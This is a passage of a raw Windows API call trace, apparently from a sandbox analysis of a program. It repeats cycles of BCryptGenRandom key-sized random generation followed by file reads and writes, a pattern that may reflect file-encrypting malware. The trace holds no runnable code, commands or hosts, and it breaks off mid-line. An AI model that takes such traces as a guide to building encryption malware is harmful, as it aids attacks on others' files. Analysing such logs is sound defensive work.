BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0108.554] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.554] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.554] free (_Block=0x77d800) [0108.554] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.554] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.554] free (_Block=0x1fa4848) [0108.554] free (_Block=0x2071818) [0108.554] free (_Block=0x77d908) [0108.554] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.555] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.556] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.556] CloseHandle (hObject=0x13c0) returned 1 [0108.557] free (_Block=0x1ff1e60) [0108.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0108.566] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.566] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0108.566] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.566] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.566] free (_Block=0x77d800) [0108.566] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.567] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.567] free (_Block=0x1fa4848) [0108.567] free (_Block=0x2071818) [0108.567] free (_Block=0x77d908) [0108.567] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.568] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.579] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xec4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.579] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.580] CloseHandle (hObject=0x13c0) returned 1 [0108.581] free (_Block=0x1ff1e60) [0108.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0108.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0108.590] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0108.590] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0108.590] free (_Block=0x77d800) [0108.590] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0108.590] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0108.591] free (_Block=0x1fa4848) [0108.591] free (_Block=0x2071818) [0108.591] free (_Block=0x77d908) [0108.591] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.591] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0108.592] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1050, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.103] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x32c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.103] CloseHandle (hObject=0x13c0) returned 1 [0109.114] free (_Block=0x1ff1e60) [0109.114] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.122] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.122] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.123] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.123] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.123] free (_Block=0x77d800) [0109.123] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.123] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.124] free (_Block=0x1fa4848) [0109.124] free (_Block=0x2071818) [0109.124] free (_Block=0x77d908) [0109.124] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.125] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.126] CloseHandle (hObject=0x13c0) returned 1 [0109.127] free (_Block=0x1ff1e60) [0109.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.135] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.135] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.135] free (_Block=0x77d800) [0109.135] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.135] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.136] free (_Block=0x1fa4848) [0109.136] free (_Block=0x2071818) [0109.136] free (_Block=0x77d908) [0109.136] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.137] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x69b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.137] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.161] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1b54, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.163] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.164] CloseHandle (hObject=0x13c0) returned 1 [0109.165] free (_Block=0x1ff1e60) [0109.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.174] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.175] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.175] free (_Block=0x77d800) [0109.175] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.175] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.175] free (_Block=0x1fa4848) [0109.175] free (_Block=0x2071818) [0109.175] free (_Block=0x77d908) [0109.175] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.175] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.176] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.179] CloseHandle (hObject=0x13c0) returned 1 [0109.180] free (_Block=0x1ff1e60) [0109.180] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.187] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.189] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.189] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.189] free (_Block=0x77d800) [0109.189] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.189] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.190] free (_Block=0x1fa4848) [0109.190] free (_Block=0x2071818) [0109.190] free (_Block=0x77d908) [0109.190] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.190] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.191] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6ba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.202] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2cec, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.203] CloseHandle (hObject=0x13c0) returned 1 [0109.208] free (_Block=0x1ff1e60) [0109.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.217] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.217] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.217] free (_Block=0x77d800) [0109.217] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.217] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.218] free (_Block=0x1fa4848) [0109.218] free (_Block=0x2071818) [0109.218] free (_Block=0x77d908) [0109.218] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.218] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.219] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.219] CloseHandle (hObject=0x13c0) returned 1 [0109.220] free (_Block=0x1ff1e60) [0109.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.230] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.230] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.230] free (_Block=0x77d800) [0109.230] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.231] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.231] free (_Block=0x1fa4848) [0109.231] free (_Block=0x2071818) [0109.231] free (_Block=0x77d908) [0109.231] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.231] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.232] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.232] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.246] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4c14, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.247] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.247] CloseHandle (hObject=0x13c0) returned 1 [0109.248] free (_Block=0x1ff1e60) [0109.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0109.255] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0109.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0109.256] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.256] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.256] free (_Block=0x77d800) [0109.256] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.256] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.257] free (_Block=0x1fa4848) [0109.257] free (_Block=0x2071818) [0109.257] free (_Block=0x77d908) [0109.257] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 